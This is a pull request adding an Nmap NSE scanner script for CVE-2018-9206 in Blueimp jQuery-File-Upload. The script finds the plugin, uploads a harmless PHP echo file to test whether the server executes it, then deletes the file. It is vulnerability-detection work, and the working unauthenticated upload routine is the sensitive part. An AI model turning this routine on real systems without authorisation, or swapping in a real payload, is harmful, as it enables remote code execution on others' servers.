### PR TITLE
Script for unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload

### DIFF
--- a/scripts/http-vuln-cve2018-9206.nse
+++ b/scripts/http-vuln-cve2018-9206.nse
@@ -1,0 +1,335 @@
+local http = require 'http'
+local io = require 'io'
+local json = require 'json'
+local rand = require 'rand'
+local shortport = require 'shortport'
+local stdnse = require 'stdnse'
+local table = require 'table'
+local url = require 'url'
+local vulns = require 'vulns'
+
+description = [[
+Unauthenticated arbitrary file upload vulnerability on jQuery-File-Upload <= v9.22.0.
+
+This version doesn't require any validation to upload files to the server.
+
+It also doesn't exclude file types and will allow any file type to be uploaded including
+executable files with .php extensions. This allows for remote code execution.
+This flaw was introduced when Apache disabled a default security control, .htaccess files,
+the library used for file access control. Default support for .htaccess files was
+eliminated starting with Apache 2.3.9 (though users can choose to enable it), leaving
+unprotected any code that used the feature to impose restrictions on folder access,
+
+References:
+* http://www.vapidlabs.com/advisory.php?v=204
+* https://threatpost.com/thousands-of-applications-vulnerable-to-rce-via-jquery-file-upload/138501/
+]]
+
+---
+-- @usage nmap --script http-vuln-cve2018-9206 -p 80,8080,443 --script-args "uri=/" <target>
+-- @output
+-- PORT   STATE SERVICE REASON
+-- 80/tcp open  http    syn-ack
+-- | http-vuln-cve2018-9206:
+-- |   VULNERABLE:
+-- |   jQuery-File-Upload unauthenticated arbitrary file upload vulnerability
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2018-9206
+-- |       Unauthenticated arbitrary file upload vulnerability on jQuery-File-Upload <= v9.22.0.
+-- |
+-- |     Disclosure date: 2018-10-09
+-- |     References:
+-- |_      http://www.vapidlabs.com/advisory.php?v=204
+--
+-- @xmloutput
+-- <table key='2018-9206'>
+-- <elem key='title'>jQuery-File-Upload unauthenticated arbitrary file upload vulnerability</elem>
+-- <elem key='state'>VULNERABLE</elem>
+-- <table key='ids'>
+-- <elem>CVE:CVE-2018-9206</elem>
+-- </table>
+-- <table key='description'>
+-- <elem>Unauthenticated arbitrary file upload vulnerability on jQuery-File-Upload <= v9.22.0.</elem>
+-- </table>
+-- <table key='dates'>
+-- <table key='disclosure'>
+-- <elem key='day'>09</elem>
+-- <elem key='month'>10</elem>
+-- <elem key='year'>2018</elem>
+-- </table>
+-- </table>
+-- <elem key='disclosure'>2018-10-09</elem>
+-- <table key='check_results'>
+-- </table>
+-- <table key='refs'>
+-- <elem>http://www.vapidlabs.com/advisory.php?v=204</elem>
+-- <elem>https://threatpost.com/thousands-of-applications-vulnerable-to-rce-via-jquery-file-upload/138501/</elem>
+-- </table>
+-- </table>
+--
+---
+
+author = 'Kostas Milonas'
+license = 'Same as Nmap--See https://nmap.org/book/man-legal.html'
+categories = {'vuln', 'intrusive'}
+
+portrule = shortport.http
+
+plugin_names = {
+  'jquery-file-upload',
+  'jQuery-File-Upload'
+}
+
+-- Given the plugin path, checks if the plugin exists
+local function plugin_exists(host, port, plugin_path)
+  local response = http.get(host, port, plugin_path, { redirect_ok = true, no_cache = true })
+  local content_type = response.header['content-type'] or ''
+
+  if response.status == 200 and (content_type:find('^text/plain') or content_type == 'application/json') then
+    return true
+  end
+
+  return false
+end
+
+-- Parse the plugin path to always return an absolute path
+local function format_plugin_path(path)
+  -- An HTML src value can be a URL, relative path or absolute path
+  local path = url.parse(path).path
+  if path:sub(1, 1) ~= '/' then
+    path = '/' .. path
+  end
+  return path
+end
+
+-- 1 of 2, plugin identification methods and most accurate.
+-- Locates the vulnerable plugin in the given URI's source code.
+local function locate_plugin(response_body, host, port)
+  local plugin_path = nil
+  local plugin_name = nil
+  local plugin_name_suffix = nil
+
+  -- Find if the given URI has the plugin, with either casing
+  for i, _plugin_name in ipairs(plugin_names) do
+    -- Escape dashes to use in a regular expression
+    __plugin_name = _plugin_name:gsub('-', '%%-')
+
+    -- Search for the plugin in the response body
+    if string.find(response_body, __plugin_name) ~= nil then
+      -- Get the plugin path and the plugin name suffix (if exists)
+      _, _, plugin_path, plugin_name_suffix = string.find(response_body, '.*<.*src=\"(.-)' .. __plugin_name .. '(.-)%/.*>.*')
+      if plugin_path ~= nil then
+        -- Some websites have a suffix (usually the version) at the plugin directory name
+        plugin_name = _plugin_name .. (plugin_name_suffix or '')
+        break
+      end
+    end
+  end
+
+  -- If the plugin was not found, fail
+  if plugin_path == nil or plugin_name == nil then
+    stdnse.debug1('Plugin not found (method 1 of 2)')
+    return nil
+  end
+
+  -- Targets, can have an HTML src attribute value of a URL, relative path or absolute path
+  plugin_path = format_plugin_path(plugin_path .. plugin_name .. '/server/php/')
+  stdnse.debug1('Plugin URI found: %s (method 1 of 2)', plugin_path)
+
+  -- Test if we can access the vulnerable plugin
+  if plugin_exists(host, port, plugin_path) then
+    stdnse.debug1('Plugin responded successfully at URI: %s (method 1 of 2)', plugin_path)
+    return plugin_path
+  end
+  stdnse.debug1('Plugin not found at URI: %s (method 1 of 2)', plugin_path)
+
+  return nil
+end
+
+-- 2 of 2, plugin identification methods, less accurate
+-- but useful if the plugin is not just loaded in the URI we are scanning.
+-- Locates the plugins directory in the given URI's source code
+-- and guesses the path of the vulnerable plugin.
+local function locate_plugins_directory(response_body, host, port)
+  -- Find if the given URI has the plugin, with either casing
+  found, _, plugins_path = string.find(response_body, '.*[\"\'](.-)plugins%/')
+
+  -- If the plugin directory was not found, fail
+  if found == nil then
+    stdnse.debug1('Plugins directory not found.')
+    return nil
+  end
+
+  plugins_path = format_plugin_path(plugins_path)
+  stdnse.debug1('Plugins directory found in URI: %s', plugins_path)
+
+  -- Try to find the vulnerable plugin
+  for i, plugin_name in ipairs(plugin_names) do
+    -- Targets, can have an HTML src attribute value of a URL, relative path or absolute path
+    local plugin_path = format_plugin_path(plugins_path .. 'plugins/' .. plugin_name .. '/server/php/')
+    stdnse.debug1('Testing assumed plugin path: %s', plugin_path)
+
+    -- Test if we made a correct guess about the plugin's location
+    if plugin_exists(host, port, plugin_path) then
+      stdnse.debug1('Plugin responded successfully at URI: %s', plugin_path)
+      return plugin_path
+    end
+  end
+
+  stdnse.debug1('Plugin not found.')
+  return nil
+end
+
+-- Exploits the plugin by trying to upload a file
+local function exploit(host, port, plugin_path)
+  -- Create a random filename and a file content
+  random_filename_no_ext = rand.random_alpha(10)
+  random_file_ext = '.php'
+  random_filename = random_filename_no_ext .. random_file_ext
+  content = '<?php echo "Hey!"; ?>'
+
+  -- Prepare the request data to upload the file
+  local data = {}
+  data['header'] = {}
+  data['header']['Content-Type'] = 'multipart/form-data; boundary=AaB03x'
+  data['content'] = '--AaB03x\nContent-Disposition: form-data; name="files[]"; filename="' .. random_filename .. '"\nContent-Type: application/x-php\n\n' .. content .. '\n--AaB03x--'
+
+  -- Upload the file
+  stdnse.debug1('Trying to upload file: %s', random_filename)
+  local response = http.post(host, port, plugin_path, data, { redirect_ok = true, no_cache = true })
+  if response.status ~= 200 or response.body:find('error["\']:') then
+    stdnse.debug1('Upload failed as the target returned an error.')
+    return false
+  end
+  stdnse.debug1('Upload request was successful.')
+
+  -- Check if the file has been uploaded
+  response = http.get(host, port, plugin_path, { redirect_ok = true, no_cache = true })
+  -- Some plugin versions add a random suffix at the filename
+  if response.status ~= 200 or not response.body:match(random_filename_no_ext .. '.*' .. random_file_ext:gsub('%.', '%%.')) then
+    stdnse.debug1('Uploaded file not found on file list.')
+    return false
+  end
+
+  stdnse.debug1('Uploaded file exists on the file list!')
+
+  --
+  -- The following do not affect the result if vulnerable or not, they are additional checks.
+  --
+
+  -- Check if the file is executable
+  -- Some versions add a random suffix to the uploaded file. Get it!
+  _, _, random_filename_suffix = string.find(response.body, '.*"' .. random_filename_no_ext .. '(.-)' .. random_file_ext:gsub('%.', '%%.') .. '".*')
+  random_filename = random_filename_no_ext .. random_filename_suffix .. random_file_ext
+
+  -- The uploaded files can be stored to a completely different directory than the plugin.
+  -- Let's find out the file's real path.
+  stdnse.debug1('Getting uploaded file information.')
+  response = http.get(host, port, plugin_path .. '/?file=' .. random_filename, { redirect_ok = true, no_cache = true })
+  if response.status ~= 200 then
+    stdnse.debug1('Server responded with an error.')
+    return true
+  end
+
+  -- Parse the file information response
+  json_status, response_json = json.parse(response.body);
+  if json_status == nil then
+    stdnse.debug1('Could not get file information. JSON response could not be parsed.')
+    return true
+  end
+
+  -- It is possible that the file URL doesn't have a scheme.
+  -- That breaks parsing the URL.
+  local file_url = response_json.file.url
+  if url.parse(file_url).scheme == nil then
+    file_url = 'http://' .. file_url
+  end
+  -- Get the path of the uploaded file, so we can request it.
+  local file_path = url.parse(file_url).path
+
+  -- Check if the file is executable
+  local message = ''
+  response = http.get(host, port, file_url, { redirect_ok = true, no_cache = true })
+  if response.status == 200 and response.body == 'Hey!' then
+    message = 'File is executable!'
+  elseif response.status ~= 200 then
+    message = 'Request for uploaded file returned status "' .. response.status .. '" (possibly renamed to something random).'
+  elseif response.body == content then
+    message = 'Uploaded file was found but is not executable (content returned as plain text).'
+  else
+    message = 'Tried to execute the uploaded file, but an unexpected error happend.'
+  end
+
+  stdnse.debug1(message)
+  table.insert(vuln_table.extra_info, message)
+
+  -- Delete the file
+  local delete_url = response_json.file.deleteUrl
+  stdnse.debug1('Deleting uploaded file.')
+  response = http.generic_request(host, port, 'DELETE', delete_url, { redirect_ok = true, no_cache = true })
+  if response.status ~= 200 then
+    stdnse.debug1('File could not be deleted.')
+  end
+  stdnse.debug1('File deleted.')
+
+  return true
+end
+
+action = function(host, port)
+  vuln_table = {
+    title = 'jQuery-File-Upload unauthenticated arbitrary file upload vulnerability',
+    IDS = {CVE = 'CVE-2018-9206'},
+    description = [[
+Unauthenticated arbitrary file upload vulnerability on jQuery-File-Upload <= v9.22.0.
+]],
+    references = {
+      'http://www.vapidlabs.com/advisory.php?v=204',
+      'https://threatpost.com/thousands-of-applications-vulnerable-to-rce-via-jquery-file-upload/138501/'
+    },
+    dates = {
+      disclosure = {year = '2018', month = '10', day = '09'},
+    },
+    check_results = {},
+    extra_info = {}
+  }
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  vuln_table.state = vulns.STATE.NOT_VULN
+
+  --
+  -- Start of actual code
+  --
+  local uri = stdnse.get_script_args('uri') or '/'
+  stdnse.debug1('Testing URI: %s', uri)
+
+  -- Get source code of URI, to try to locate the vulnerable plugin
+  local response = nil
+  response = http.get(host, port, uri, { redirect_ok = true, no_cache = true })
+  if response.status ~= 200 or response == nil or response.body == nil then
+    stdnse.debug1('Target returned an invalid response.')
+    return nil
+  end
+
+  -- Method 1, most accurate, locates the plugin in given URI's source
+  local plugin_path = nil
+  plugin_path = locate_plugin(response.body, host, port)
+  -- Method 2, locates the plugins directory in given URI's source
+  -- and then assumes the plugin's location
+  if plugin_path == nil then
+    plugin_path = locate_plugins_directory(response.body, host, port)
+  end
+
+  if plugin_path == nil then
+    return vuln_report:make_output(vuln_table)
+  end
+
+  -- Try to exploit the plugin
+  exploit_success = exploit(host, port, plugin_path)
+  if exploit_success then
+    stdnse.debug1('Vulnerability found!')
+    table.insert(vuln_table['extra_info'], 'Vulnerable URI: ' .. plugin_path)
+    vuln_table.state = vulns.STATE.VULN
+  end
+
+  return vuln_report:make_output(vuln_table)
+end


### PR DESCRIPTION
Hello everyone.

I'm working a few days on this. Its a script for CVE-2018-9206, the unauthenticated arbitrary file upload vulnerability in Blueimp's jQuery-File-Upload plugin.

There are two different types that the script identifies if a target is vulnerable:
- Find the plugin itself on the source of the given URI (arg) or by default the root
And if this fails:
- Find the plugins directory and try a couple of common namings of the plugin to locate it.

If the plugin is found:
- tries to exploit the target by uploading a random PHP file (just containing an echo() call)
- tests if its executable (PHP code is interpreted)
- and then deletes it.

Because the file is uploaded (even if it gets deleted at the end, its marked as intrusive.

The targets I tested it had deferent versions of the plugin, so I solved as many edge cases as possible.

Thank you in advance.